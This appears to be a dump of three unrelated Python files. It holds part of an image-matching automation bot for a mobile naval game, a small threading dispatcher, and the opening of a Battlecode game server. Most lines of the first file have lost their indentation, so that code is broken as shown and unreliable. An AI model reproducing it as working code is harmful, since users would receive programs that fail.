not Utils.check_oil(self.config.combat['oil_limit']):
break
else:
self.exit = 0
Logger.log_msg("Repeating map {}.".format(self.chapter_map))
Utils.touch_randomly(map_region)
continue
if self.exit > 2:
self.stats.increment_combat_attempted()
break
if Utils.find("combat/button_go", 0.9):
Logger.log_debug("Found map summary go button.")
Utils.touch_randomly(self.region["map_summary_go"])
Utils.wait_update_screen()
if Utils.find("combat/menu_fleet") and (lambda x:x > 414 and x < 584)(Utils.find("combat/menu_fleet").y) and not self.config.combat['boss_fleet']:
if not self.chapter_map[0].isdigit() and string.ascii_uppercase.index(self.chapter_map[2:3]) < 1 or self.chapter_map[0].isdigit():
Logger.log_msg("Removing second fleet from fleet selection.")
Utils.touch_randomly(self.region["clear_second_fleet"])
if Utils.find("combat/menu_select_fleet"):
Logger.log_debug("Found fleet select go button.")
Utils.touch_randomly(self.region["fleet_menu_go"])
Utils.wait_update_screen(2)
if Utils.find("combat/button_retreat"):
Logger.log_debug("Found retreat button, starting clear function.")
if not self.clear_map():
self.stats.increment_combat_attempted()
break
Utils.wait_update_screen()
if Utils.find("menu/button_sort"):
if self.config.enhancement['enabled'] and not enhancement_failed:
if not self.enhancement_module.enhancement_logic_wrapper(forced=True):
enhancement_failed = True
Utils.script_sleep(1)
Utils.touch_randomly(map_region)
continue
elif self.config.retirement['enabled'] and not retirement_failed:
if not self.retirement_module.retirement_logic_wrapper(forced=True):
retirement_failed = True
else:
# reset enhancement flag
enhancement_failed = False
Utils.script_sleep(1)
Utils.touch_randomly(map_region)
continue
else:
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 4
break
if Utils.find("combat/alert_morale_low"):
if self.config.combat['ignore_morale']:
Utils.find_and_touch("menu/button_confirm")
else:
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 3
break
if Utils.find("menu/button_confirm"):
Logger.log_msg("Found commission info message.")
Utils.touch_randomly(self.region["combat_com_confirm"])
Utils.script_sleep(1)
Utils.menu_navigate("menu/button_battle")
return self.exit
def reach_map(self):
"""
Method which returns the map region for the stage set in the configuration file.
If the map isn't found, it navigates the map selection menu to get to the world where the specified map is located.
Only works with standard maps up to worlds 13 and some event maps.
Also checks if hard mode is enabled, and if it's legit to keep it so (event maps C and D).
If nothing is found even after menu navigation, it stops the bot workflow until the user moves to the right
screen or the map asset is substituted with the right one.
Returns:
(Region): the map region of the selected stage.
"""
Utils.wait_update_screen()
# get to map selection menu
if Utils.find("menu/button_battle"):
Logger.log_debug("Found menu battle button.")
Utils.touch_randomly(self.region["menu_button_battle"])
Utils.wait_update_screen(2)
# correct map mode
if not self.chapter_map[0].isdigit():
letter = self.chapter_map[2]
event_maps = ['A', 'B', 'S', 'C', 'D']
Utils.touch_randomly(self.region['event_button'])
Utils.wait_update_screen(1)
            if (event_maps.index(letter) < 3 and Utils.find("menu/button_normal_mode", 0.8)) or \
                    (event_maps.index(letter) > 2 and not Utils.find("menu/button_normal_mode", 0.8)):
Utils.touch_randomly(self.region['normal_mode_button'])
Utils.wait_update_screen(1)
else:
if Utils.find("menu/button_normal_mode"):
Logger.log_debug("Disabling hard mode.")
Utils.touch_randomly(self.region['normal_mode_button'])
Utils.wait_update_screen(1)
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
        if map_region is not None:
Logger.log_msg("Found specified map.")
return map_region
else:
# navigate map selection menu
if not self.chapter_map[0].isdigit():
if (self.chapter_map[2] == 'A' or self.chapter_map[2] == 'C') and \
(Utils.find('maps/map_E-B1', 0.99) or Utils.find('maps/map_E-D1', 0.99)):
Utils.touch_randomly(self.region['map_nav_left'])
Logger.log_debug("Swiping to the left")
elif (self.chapter_map[2] == 'B' or self.chapter_map[2] == 'D') and \
(Utils.find('maps/map_E-A1', 0.99) or Utils.find('maps/map_E-C1', 0.99)):
Utils.touch_randomly(self.region['map_nav_right'])
Logger.log_debug("Swiping to the right")
else:
_map = 0
for x in range(1, 14):
if Utils.find("maps/map_{}-1".format(x), 0.99):
_map = x
break
if _map != 0:
taps = int(self.chapter_map.split("-")[0]) - _map
for x in range(0, abs(taps)):
if taps >= 1:
Utils.touch_randomly(self.region['map_nav_right'])
Logger.log_debug("Swiping to the right")
Utils.script_sleep()
else:
Utils.touch_randomly(self.region['map_nav_left'])
Logger.log_debug("Swiping to the left")
Utils.script_sleep()
Utils.wait_update_screen()
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
        if map_region is None:
            Logger.log_error("Cannot find the specified map, please move to the world where it's located.")
            while map_region is None:
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
Utils.wait_update_screen(1)
Logger.log_msg("Found specified map.")
return map_region
def battle_handler(self, boss=False):
Logger.log_msg("Starting combat.")
        # enhancement and retirement flags
enhancement_failed = False
retirement_failed = False
while not (Utils.find("combat/menu_loading", 0.8)):
Utils.update_screen()
if Utils.find("menu/button_sort"):
if self.config.enhancement['enabled'] and not enhancement_failed:
if not self.enhancement_module.enhancement_logic_wrapper(forced=True):
enhancement_failed = True
elif self.config.retirement['enabled'] and not retirement_failed:
if not self.retirement_module.retirement_logic_wrapper(forced=True):
retirement_failed = True
else:
self.retreat_handler()
return False
elif Utils.find("combat/alert_morale_low"):
if self.config.combat['ignore_morale']:
Utils.find_and_touch("menu/button_confirm")
else:
self.retreat_handler()
return False
elif Utils.find("combat/combat_pause", 0.7):
Logger.log_warning("Loading screen was not found but combat pause is present, assuming combat is initiated normally.")
break
else:
Utils.touch_randomly(self.region["menu_combat_start"])
Utils.script_sleep(1)
Utils.script_sleep(4)
# flags
in_battle = True
items_received = False
locked_ship = False
confirmed_fight = False
defeat = False
confirmed_fleet_switch = False
while True:
Utils.update_screen()
if in_battle and Utils.find("combat/combat_pause", 0.7):
Logger.log_debug("In battle.")
Utils.script_sleep(2.5)
continue
if not items_received:
if Utils.find("combat/menu_touch2continue"):
Logger.log_debug("Combat ended: tap to continue")
Utils.touch_randomly(self.region['tap_to_continue'])
in_battle = False
continue
if Utils.find("menu/item_found"):
Logger.log_debug("Combat ended: items received screen")
Utils.touch_randomly(self.region['tap_to_continue'])
Utils.script_sleep(1)
continue
if (not locked_ship) and Utils.find("combat/alert_lock"):
Logger.log_msg("Locking received ship.")
Utils.touch_randomly(self.region['lock_ship_button'])
locked_ship = True
continue
if Utils.find("menu/drop_elite"):
Logger.log_msg("Received ELITE ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_rare"):
Logger.log_msg("Received new RARE ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_ssr"):
Logger.log_msg("Received SSR ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_common"):
Logger.log_msg("Received new COMMON ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
if not in_battle:
if (not confirmed_fight) and Utils.find("combat/button_confirm"):
Logger.log_msg("Combat ended.")
items_received = True
confirmed_fight = True
Utils.touch_randomly(self.region["combat_end_confirm"])
if boss:
return True
Utils.wait_update_screen(3)
if (not confirmed_fight) and Utils.find("combat/commander"):
items_received = True
# prevents fleet with submarines from getting stuck at combat end screen
Utils.touch_randomly(self.region["combat_dismiss_surface_fleet_summary"])
continue
if defeat and not confirmed_fleet_switch:
if Utils.find("combat/alert_unable_battle"):
Utils.touch_randomly(self.region['close_info_dialog'])
Utils.script_sleep(3)
self.exit = 5
return False
if Utils.find("combat/alert_fleet_cannot_be_formed"):
# fleet will be automatically switched
Utils.touch_randomly(self.region['close_info_dialog'])
confirmed_fleet_switch = True
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
Utils.script_sleep(3)
continue
else:
# flagship sunk, but part of backline still remains
# proceed to retreat
Utils.script_sleep(3)
self.exit = 5
return False
if confirmed_fight and Utils.find("menu/button_confirm"):
Logger.log_msg("Found commission info message.")
Utils.touch_randomly(self.region["combat_com_confirm"])
continue
if confirmed_fight and Utils.find("combat/button_retreat"):
#Utils.touch_randomly(self.region["hide_strat_menu"])
if confirmed_fleet_switch:
# if fleet was defeated and it has now been switched
return False
else:
# fleet won the fight
self.combats_done += 1
self.kills_count += 1
if self.kills_count >= self.kills_before_boss[self.chapter_map]:
Utils.script_sleep(2.5)
return True
if confirmed_fight and Utils.find_and_touch("combat/defeat_close_button"):
Logger.log_debug("Fleet was defeated.")
defeat = True
Utils.script_sleep(3)
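    # Return value of battle_handler, summarized: True means the fight chain is
    # considered done (boss fight won, or enough kills collected before the
    # boss); False means a retreat, low morale, full dock or a fleet switch
    # interrupted it, with self.exit set accordingly.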
def movement_handler(self, target_info):
"""
Method that handles the fleet movement until it reach its target (mystery node or enemy node).
If the coordinates are wrong, they will be blacklisted and another set of coordinates to work on is obtained.
If the target is a mystery node and what is found is ammo, then the method will fall in the blacklist case
and search for another enemy: this is inefficient and should be improved, but it works.
Args:
target_info (list): coordinate_x, coordinate_y, type. Describes the selected target.
Returns:
(int): 1 if a fight is needed, otherwise 0.
"""
Logger.log_msg("Moving towards objective.")
count = 0
location = [target_info[0], target_info[1]]
Utils.script_sleep(1)
while True:
Utils.update_screen()
event = self.check_movement_threads()
if (self.chapter_map[0].isdigit() and not self.config.combat['clearing_mode']) and event["combat/button_evade"]:
Logger.log_msg("Ambush was found, trying to evade.")
Utils.touch_randomly(self.region["combat_ambush_evade"])
Utils.script_sleep(0.5)
continue
if (self.chapter_map[0].isdigit() and not self.config.combat['clearing_mode']) and event["combat/alert_failed_evade"]:
Logger.log_warning("Failed to evade ambush.")
self.kills_count -= 1
Utils.touch_randomly(self.region["menu_combat_start"])
self.battle_handler()
continue
if self.chapter_map[0].isdigit() and event["combat/alert_ammo_supplies"]:
Logger.log_msg("Received ammo supplies")
if target_info[2] == "mystery_node":
Logger.log_msg("Target reached.")
self.fleet_location = target_info[0:2]
return 0
continue
if self.chapter_map[0].isdigit() and event["menu/item_found"]:
Logger.log_msg("Item found on node.")
Utils.touch_randomly(self.region['tap_to_continue'])
if Utils.find("combat/menu_emergency"):
Utils.script_sleep(1)
Utils.touch_randomly(self.region["close_strategy_menu"])
if target_info[2] == "mystery_node":
Logger.log_msg("Target reached.")
self.fleet_location = target_info[0:2]
return 0
continue
if event["menu/alert_info"]:
Logger.log_debug("Found alert.")
Utils.find_and_touch("menu/alert_close")
continue
if event["combat/menu_loading"]:
self.fleet_location = target_info[0:2]
return 1
elif event["combat/menu_formation"]:
Utils.find_and_touch("combat/auto_combat_off")
self.fleet_location = target_info[0:2]
return 1
else:
if count != 0 and count % 3 == 0:
Utils.touch(location)
if count > 21:
Logger.log_msg("Blacklisting location and searching for another enemy.")
self.blacklist.append(location[0:2])
self.fleet_location = None
location = self.get_closest_target(self.blacklist, mystery_node=(not self.config.combat["ignore_mystery_nodes"]))
count = 0
count += 1
def unable_handler(self, coords, boss=False):
"""
Method called when the path to the target (boss fleet or mystery node) is obstructed by mobs:
it procedes to switch targets to the mobs which are blocking the path.
Args:
coords (list): coordinate_x, coordinate_y. These coordinates describe the target's location.
"""
if boss:
Logger.log_debug("Unable to reach boss function started.")
else:
Logger.log_debug("Unable to reach selected target function started.")
self.blacklist.clear()
closest_to_unreachable_target = self.get_closest_target(self.blacklist, coords, boss=boss)
Utils.touch(closest_to_unreachable_target)
Utils.update_screen()
if Utils.find("combat/alert_unable_reach"):
Logger.log_warning("Unable to reach next to selected target.")
self.blacklist.append(closest_to_unreachable_target[0:2])
while True:
closest_enemy = self.get_closest_target(self.blacklist)
Utils.touch(closest_enemy)
Utils.update_screen()
if Utils.find("combat/alert_unable_reach"):
self.blacklist.append(closest_enemy[0:2])
else:
break
self.movement_handler(closest_enemy)
if not self.battle_handler():
return False
return True
else:
self.movement_handler(closest_to_unreachable_target)
if not self.battle_handler():
return False
return True
def retreat_handler(self):
""" Retreats if necessary.
"""
while True:
Utils.wait_update_screen(2)
if Utils.find("combat/alert_morale_low"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 3
continue
if Utils.find("menu/button_sort"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 4
continue
if Utils.find("combat/menu_formation"):
Utils.touch_randomly(self.region["menu_nav_back"])
continue
if Utils.find("combat/button_retreat"):
Utils.touch_randomly(self.region['retreat_button'])
continue
if Utils.find("menu/button_confirm"):
Utils.touch_randomly(self.region['combat_com_confirm'])
continue
if Utils.find("menu/attack"):
if self.exit != 1 and self.exit != 2 and self.exit != 5:
Logger.log_msg("Retreating...")
return
def clear_map(self):
""" Clears map.
"""
self.fleet_location = None
self.combats_done = 0
self.kills_count = 0
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
self.swipe_counter = 0
Logger.log_msg("Started map clear.")
Utils.script_sleep(2.5)
while Utils.find("combat/fleet_lock", 0.99):
Utils.touch_randomly(self.region["fleet_lock"])
Logger.log_warning("Fleet lock is not supported, disabling it.")
Utils.wait_update_screen()
#swipe map to fit everything on screen
swipes = {
'E-A2': lambda: Utils.swipe(960, 540, 960, 580, 300),
'E-A3': lambda: Utils.swipe(960, 540, 960, 500, 300),
'E-B3': lambda: Utils.swipe(1040, 640, 960, 440, 300),
'E-C2': lambda: Utils.swipe(960, 540, 960, 580, 300),
'E-C3': lambda: Utils.swipe(960, 540, 960, 500, 300),
'E-D3': lambda: Utils.swipe(1040, 640, 960, 440, 300),
'7-2': lambda: Utils.swipe(960, 540, 400, 600, 300),
'12-2': lambda: Utils.swipe(1000, 570, 1300, 540, 300),
'12-3': lambda: Utils.swipe(1250, 530, 1300, 540, 300),
'12-4': lambda: Utils.swipe(960, 300, 960, 540, 300),
'13-1': lambda: Utils.swipe(1020, 500, 1300, 540, 300),
'13-2': lambda: Utils.swipe(1125, 550, 1300, 540, 300),
'13-3': lambda: Utils.swipe(1150, 510, 1300, 540, 300),
'13-4': lambda: Utils.swipe(1200, 450, 1300, 540, 300)
}
swipes.get(self.chapter_map, lambda: Utils.swipe(960, 540, 450, 540, 300))()
# disable subs' hunting range
if self.config.combat["hide_subs_hunting_range"]:
Utils.script_sleep(0.5)
Utils.touch_randomly(self.region["open_strategy_menu"])
Utils.script_sleep()
Utils.touch_randomly(self.region["disable_subs_hunting_radius"])
Utils.script_sleep()
Utils.touch_randomly(self.region["close_strategy_menu"])
target_info = self.get_closest_target(self.blacklist)
while True:
Utils.update_screen()
if Utils.find("combat/alert_unable_battle"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 5
if self.config.combat['retreat_after'] != 0 and self.combats_done >= self.config.combat['retreat_after']:
Logger.log_msg("Retreating after defeating {} enemies".format(self.config.combat['retreat_after']))
self.exit = 2
if self.exit != 0:
self.retreat_handler()
return True
if self.kills_count >= self.kills_before_boss[self.chapter_map] and Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9):
Logger.log_msg("Boss fleet was found.")
if self.config.combat['boss_fleet']:
s = 0
swipes = {
0: lambda: Utils.swipe(960, 240, 960, 940, 300),
1: lambda: Utils.swipe(1560, 540, 260, 540, 300),
2: lambda: Utils.swipe(960, 940, 960, 240, 300),
3: lambda: Utils.swipe(260, 540, 1560, 540, 300)
}
Utils.touch_randomly(self.region['button_switch_fleet'])
Utils.wait_update_screen(2)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
if self.chapter_map == 'E-B3' or self.chapter_map == 'E-D3':
# sometimes the fleet marker blocks the view of the boss icon
# moving the boss fleet first to the right and then to the left
# to get a clear view of the boss
counter = 1
self.fleet_location = [960, 540]
while not boss_region:
if counter % 2 != 0:
Utils.touch([self.fleet_location[0] + (counter % 5) * 200, self.fleet_location[1]])
self.fleet_location[0] += (counter % 5) * 200
else:
Utils.touch([self.fleet_location[0] - (counter % 5) * 200, self.fleet_location[1]])
self.fleet_location[0] -= (counter % 5) * 200
Utils.wait_update_screen()
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
counter += 1
                        if counter == 5:
                            # skip 5 so the (counter % 5) offset never becomes zero
                            counter += 1
if counter == 10:
# back to starting position
counter = 1
self.fleet_location = [960, 540]
else:
while not boss_region:
if s > 3: s = 0
swipes.get(s)()
Utils.wait_update_screen(0.5)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss")
s += 1
# swipe to center the boss fleet on the screen
# first calculate the translation vector coordinates
horizontal_translation = 150 if boss_region.x < 960 else - 150
angular_coefficient = -1 * ((540 - boss_region.y)/(960 - boss_region.x))
Utils.swipe(boss_region.x + horizontal_translation, boss_region.y + int(horizontal_translation * angular_coefficient),
960 + horizontal_translation, 540 + int(horizontal_translation * angular_coefficient), 300)
Utils.wait_update_screen()
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
while not boss_region:
# refreshing screen to deal with mist
Utils.wait_update_screen(1)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
#extrapolates boss_info(x,y,enemy_type) from the boss_region found
boss_info = [boss_region.x + 50, boss_region.y + 25, "boss"]
self.clear_boss(boss_info)
continue
            if target_info is None:
target_info = self.get_closest_target(self.blacklist, mystery_node=(not self.config.combat["ignore_mystery_nodes"]))
if target_info:
#tap at target's coordinates
Utils.touch(target_info[0:2])
Utils.update_screen()
else:
continue
if Utils.find("combat/alert_unable_reach", 0.8):
Logger.log_warning("Unable to reach the target.")
if self.config.combat['focus_on_mystery_nodes'] and target_info[2] == "mystery_node":
self.enemies_list.clear()
self.unable_handler(target_info[0:2])
else:
self.blacklist.append(target_info[0:2])
target_info = None
continue
else:
movement_result = self.movement_handler(target_info)
if movement_result == 1:
self.battle_handler()
target_info = None
self.blacklist.clear()
continue
def clear_boss(self, boss_info):
Logger.log_debug("Started boss function.")
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
self.fleet_location = None
while True:
#tap at boss' coordinates
Utils.touch(boss_info[0:2])
Utils.update_screen()
if Utils.find("combat/alert_unable_reach", 0.8):
Logger.log_msg("Unable to reach boss.")
#handle boss' coordinates
if not self.unable_handler(boss_info[0:2], boss=True):
return
continue
else:
self.movement_handler(boss_info)
if self.battle_handler(boss=True):
self.exit = 1
Logger.log_msg("Boss successfully defeated.")
Utils.script_sleep(3)
return
    def get_enemies(self, blacklist=None, boss=False):
        if blacklist is None:
            blacklist = []
        sim = 0.99
        filter_coordinates = len(self.enemies_list) == 0
        if blacklist:
            Logger.log_info('Blacklist: ' + str(blacklist))
        if len(blacklist) > 2:
            self.enemies_list.clear()
while not self.enemies_list:
if (boss and len(blacklist) > 4) or (not boss and len(blacklist) > 3) or sim < 0.97:
if self.swipe_counter > 3: self.swipe_counter = 0
swipes = {
0: lambda: Utils.swipe(960, 240, 960, 940, 300),
1: lambda: Utils.swipe(1560, 540, 260, 540, 300),
2: lambda: Utils.swipe(960, 940, 960, 240, 300),
3: lambda: Utils.swipe(260, 540, 1560, 540, 300)
}
swipes.get(self.swipe_counter)()
sim += 0.005
self.swipe_counter += 1
Utils.update_screen()
            def on_screen(c):
                # keep only coordinates that fall inside the visible map area
                return (242 < c[1] < 1070 and 180 < c[0] < 955) or \
                       (160 < c[1] < 938 and 550 < c[0] < 1770)
            # (template, similarity delta, x offset, y offset, use mask)
            templates = [
                ('enemy/fleet_level', -0.025, -3, -27, True),
                ('enemy/fleet_1_down', -0.02, 75, 110, False),
                ('enemy/fleet_2_down', -0.02, 75, 90, False),
                ('enemy/fleet_3_up', -0.035, 75, 125, False),
                ('enemy/fleet_3_down', -0.035, 75, 100, False),
                ('enemy/fleet_2_up', -0.025, 75, 110, False)
            ]
            found = []
            for name, delta, dx, dy, use_mask in templates:
                matches = Utils.find_all(name, sim + delta, useMask=True) if use_mask \
                    else Utils.find_all(name, sim + delta)
                hits = [c for c in ([m[0] + dx, m[1] + dy] for m in matches)
                        if on_screen(c) and not self.filter_blacklist(c, blacklist)]
                Logger.log_debug("{}: {}".format(name, hits))
                found.extend(hits)
            if self.config.combat['siren_elites']:
                elites = [x for x in Utils.find_siren_elites() if not self.filter_blacklist(x, blacklist)]
                Logger.log_debug("Siren elites: " + str(elites))
                found.extend(elites)
            self.enemies_list = found
sim -= 0.005
if filter_coordinates:
self.enemies_list = Utils.filter_similar_coords(self.enemies_list)
return self.enemies_list
    def get_mystery_nodes(self, blacklist=None, boss=False):
        """Method which returns a list of mystery nodes' coordinates.
        """
        if blacklist is None:
            blacklist = []
        if len(blacklist) > 2:
            self.mystery_nodes_list.clear()
if len(self.mystery_nodes_list) == 0 and not Utils.find('combat/question_mark', 0.9):
# if list is empty and a question mark is NOT found
return self.mystery_nodes_list
else:
# list has elements or list is empty but a question mark has been found
            filter_coordinates = len(self.mystery_nodes_list) == 0
sim = 0.95
while not self.mystery_nodes_list and sim > 0.93:
Utils.update_screen()
                l1 = [c for c in ([m[0], m[1] + 140] for m in Utils.find_all('combat/question_mark', sim))
                      if ((242 < c[1] < 1070 and 180 < c[0] < 955) or
                          (160 < c[1] < 938 and 550 < c[0] < 1790))
                      and not self.filter_blacklist(c, blacklist)]
self.mystery_nodes_list = l1
sim -= 0.005
if filter_coordinates:
self.mystery_nodes_list = Utils.filter_similar_coords(self.mystery_nodes_list)
return self.mystery_nodes_list
def filter_blacklist(self, coord, blacklist):
for y in blacklist:
if abs(coord[0] - y[0]) < 40 and abs(coord[1] - y[1]) < 40:
return True
return False
def get_fleet_location(self):
"""Method to get the fleet's current location. Note it uses the green
fleet marker to find the location but returns around the area of the
feet of the flagship
Returns:
array: An array containing the x and y coordinates of the fleet's
current location.
"""
if not self.fleet_location:
coords = [0, 0]
count = 0
while coords == [0, 0]:
Utils.update_screen()
count += 1
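                # note: after a few misses the map is nudged downwards so a fleet
                # marker hidden behind the HUD scrolls into view; the resulting
                # y shift is compensated by the `count * 20` terms below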
if count > 4:
Utils.swipe(960, 540, 960, 540 + 150 + count * 20, 100)
Utils.update_screen()
if Utils.find('combat/fleet_ammo', 0.8):
coords = Utils.find('combat/fleet_ammo', 0.8)
coords = [coords.x + 140, coords.y + 225 - count * 20]
elif Utils.find('combat/fleet_arrow', 0.9):
coords = Utils.find('combat/fleet_arrow', 0.9)
coords = [coords.x + 25, coords.y + 320 - count * 20]
if count > 4:
Utils.swipe(960, 540 + 150 + count * 20, 960, 540, 100)
                elif math.isclose(coords[0], 160, abs_tol=30) and math.isclose(coords[1], 142, abs_tol=30):
coords = [0, 0]
self.fleet_location = coords
return self.fleet_location
    def get_closest_target(self, blacklist=None, location=None, mystery_node=False, boss=False):
"""Method to get the enemy closest to the specified location. Note
this will not always be the enemy that is actually closest due to the
asset used to find enemies and when enemies are obstructed by terrain
or the second fleet
Args:
            blacklist(array, optional): Defaults to None. An array of
                coordinates to exclude when searching for the closest enemy
            location(array, optional): Defaults to None. An array of coordinates
                to replace the fleet location.
            mystery_node(bool, optional): Defaults to False. If True, mystery
                nodes on story maps are considered valid targets as well.
            boss(bool, optional): Defaults to False. If True, the search is
                performed while hunting the boss fleet.
Returns:
array: An array containing the x and y coordinates of the closest
enemy to the specified location
"""
        fleet_location = self.get_fleet_location()
        if blacklist is None:
            blacklist = []
        if not location:
            location = fleet_location
if mystery_node and self.chapter_map[0].isdigit():
mystery_nodes = self.get_mystery_nodes(blacklist, boss)
if self.config.combat['focus_on_mystery_nodes'] and len(mystery_nodes) > 0:
# giving mystery nodes top priority and ignoring enemies
targets = mystery_nodes
Logger.log_info("Prioritizing mystery nodes.")
else:
# mystery nodes are valid targets, same as enemies
enemies = self.get_enemies(blacklist, boss)
targets = enemies + mystery_nodes
else:
# target only enemy mobs
targets = self.get_enemies(blacklist, boss)
closest = targets[Utils.find_closest(targets, location)[1]]
Logger.log_info('Current location is: {}'.format(fleet_location))
Logger.log_info('Targets found at: {}'.format(targets))
Logger.log_info('Closest target is at {}'.format(closest))
if closest in self.enemies_list:
x = self.enemies_list.index(closest)
del self.enemies_list[x]
target_type = "enemy"
else:
x = self.mystery_nodes_list.index(closest)
del self.mystery_nodes_list[x]
target_type = "mystery_node"
return [closest[0], closest[1], target_type]
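    # e.g. a returned value of [1234, 567, "enemy"] (coordinates hypothetical)
    # tells movement_handler whether a fight is expected at the target node.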
def check_movement_threads(self):
thread_list = []
# essential threads
thread_check_alert_info = Thread(
target=self.check_movement_threads_func, args=("menu/alert_info",))
thread_check_menu_formation = Thread(
target=self.check_movement_threads_func, args=("combat/menu_formation",))
thread_check_menu_loading = Thread(
target=self.check_movement_threads_func, args=("combat/menu_loading",))
thread_list.extend([thread_check_alert_info, thread_check_menu_formation, thread_check_menu_loading])
# threads needed for non-event maps (where mystery nodes appears)
if self.chapter_map[0].isdigit():
thread_check_alert_ammo = Thread(
target=self.check_movement_threads_func, args=("combat/alert_ammo_supplies",))
thread_check_item_found = Thread(
target=self.check_movement_threads_func, args=("menu/item_found",))
thread_list.extend([thread_check_alert_ammo, thread_check_item_found])
# threads needed for story maps without clearing mode enabled
if not self.config.combat['clearing_mode']:
thread_check_button_evade = Thread(
target=self.check_movement_threads_func, args=("combat/button_evade",))
thread_check_failed_evade = Thread(
target=self.check_movement_threads_func, args=("combat/alert_failed_evade",))
thread_list.extend([thread_check_button_evade, thread_check_failed_evade])
Utils.multithreader(thread_list)
return self.movement_event
def check_movement_threads_func(self, event):
        self.movement_event[event] = bool(Utils.find(event))
|
queue.py
|
import threading
from queue import Queue

def dispatcher():
    queues = []
    handles = []
    def reg(fn):
        q = Queue()
        queues.append(q)
        t = threading.Thread(target=fn, args=(q,), daemon=True)
        handles.append(t)  # keep the thread so run() can start it
        return q
    def run():
        for t in handles:
            t.start()
    return reg, run
reg, run = dispatcher()
def handle(q: Queue):
    while True:
        data = q.get()
        if data:
            pass  # placeholder: process the received item here
reg(handle)
run()
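
# Hedged usage sketch: with reg returning the handler's queue (see fix above),
# a producer can feed a registered handler directly:
#
#     reg2, run2 = dispatcher()
#     q2 = reg2(handle)
#     run2()
#     q2.put("ping")   # handle() can pick this up from its queue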
|
server.py
|
#!/usr/bin/env python3
'''
This starts the socket server to which things connect to play the game
'''
import socketserver
import socket # pylint: disable=unused-import
import threading
import time
import random
import sys
import logging
import os.path
try:
import ujson as json
except ImportError:
import json
import battlecode as bc
NUM_PLAYERS = 4
PKEYS = {
int(bc.Planet.Earth): {
int(bc.Team.Red): 0,
int(bc.Team.Blue): 1,
},
int(bc.Planet.Mars): {
int(bc.Team.Red): 2,
int(bc.Team.Blue): 3,
}
}
def _key(p):
p = p['player']
return PKEYS[int(p.planet)][int(p.team)]
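# e.g. _key({'player': bc.Player(bc.Team.Blue, bc.Planet.Mars)}) == 3, giving a
# stable Earth-Red, Earth-Blue, Mars-Red, Mars-Blue ordering of the players.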
BUILD_TIMEOUT = 60
TIMEOUT = 50 # seconds
class TimeoutError(Exception):  # shadows the builtin TimeoutError within this module
pass
class Game(object): # pylint: disable=too-many-instance-attributes
    '''
    This class contains the game information, and is started at the beginning
    of the process.
    It handles talking to the rust engine, and sending data to the client.
    This class also processes the received data from the client, but the actual
    reception is done by the ReceiveHandler and socket server
    '''
    def __init__(self, game_map: bc.GameMap, logging_level=logging.DEBUG,
                 logging_file="server.log", time_pool=10000, time_additional=50,
                 terminal_viewer=False, map_name="unknown",
                 extra_delay=0):
        '''
        Initialize the Game object.
        Args:
            game_map: The map the game is played on
            logging_level: Verbosity level for the server log
            logging_file: File the server log is written to
            time_pool: Initial time pool per player, in milliseconds
            time_additional: Time added to a player's pool each turn, in milliseconds
            terminal_viewer: If True, render the game state in the terminal
            map_name: Name of the map (used in state reports)
            extra_delay: Extra delay per turn in milliseconds (for viewing)
        '''
        self.terminal_viewer = terminal_viewer
        self.extra_delay = extra_delay
        self.time_pool = time_pool/1000.
        self.time_additional = time_additional/1000.
        logging.basicConfig(filename=logging_file, level=logging_level)
self.players = [] # Array containing the player ids
# Dict taking player id and giving bool of log in
self.player_logged = {}
# Dict taking player id and giving amount of time left as float
self.times = {}
# List of how many players per team are connected (red,blue).
self.connected_players = [0,0]
self.disconnected = False
# Initialize the players
for index in range(NUM_PLAYERS):
new_id = random.randrange(10**30)
self.players.append({'id':new_id})
self.players[-1]['player'] = bc.Player(bc.Team.Red if index % 2 == 0 else bc.Team.Blue, bc.Planet.Earth if index < 2 else bc.Planet.Mars)
self.players[-1]['running_stats'] = {
"tl": time_pool,
"atu": 0,
"lng": "?",
"bld": True
}
self.players[-1]['built_successfully'] = False
self.player_logged[new_id] = False
self.times[new_id] = self.time_pool
self.started = False
self.game_over = False
# Lock thread running player should hold
self.current_player_index = 0
self.turn_events = [threading.Event() for _ in range(len(self.players))]
self.map = game_map
self.manager = bc.GameController.new_manager(self.map)
for player in self.players:
player['start_message'] = self.manager.start_game(player['player']).to_json()
self.viewer_messages = []
manager_start_message = self.manager.initial_start_turn_message(int(1000 * self.time_pool))
self.manager_viewer_messages = []
self.manager_viewer_messages.append(self.manager.manager_viewer_message())
self.last_message = manager_start_message.start_turn.to_json()
self.viewer_messages.append(manager_start_message.viewer.to_json())
self.initialized = 0
self.map_name = map_name
self.start_time = time.time()
def state_report(self):
name = self.map_name
if '/' in name:
name = name[name.rfind('/') + 1:]
if '.' in name:
name = name[:name.find('.')]
game = {
"id": 0, #unknown
"map": name,
"round": self.manager.round(),
"time": int((time.time() - self.start_time) * 1000),
"red": {
"id": 0,
},
"blue": {
"id": 0,
}
}
for player in self.players:
p = player["player"]
t = "red" if p.team == bc.Team.Red else "blue"
p = "earth" if p.planet == bc.Planet.Earth else "mars"
game[t][p] = player["running_stats"]
return game
    def player_id2index(self, client_id):
        for i, player in enumerate(self.players):
            if player['id'] == client_id:
                return i
        raise Exception("Invalid id")
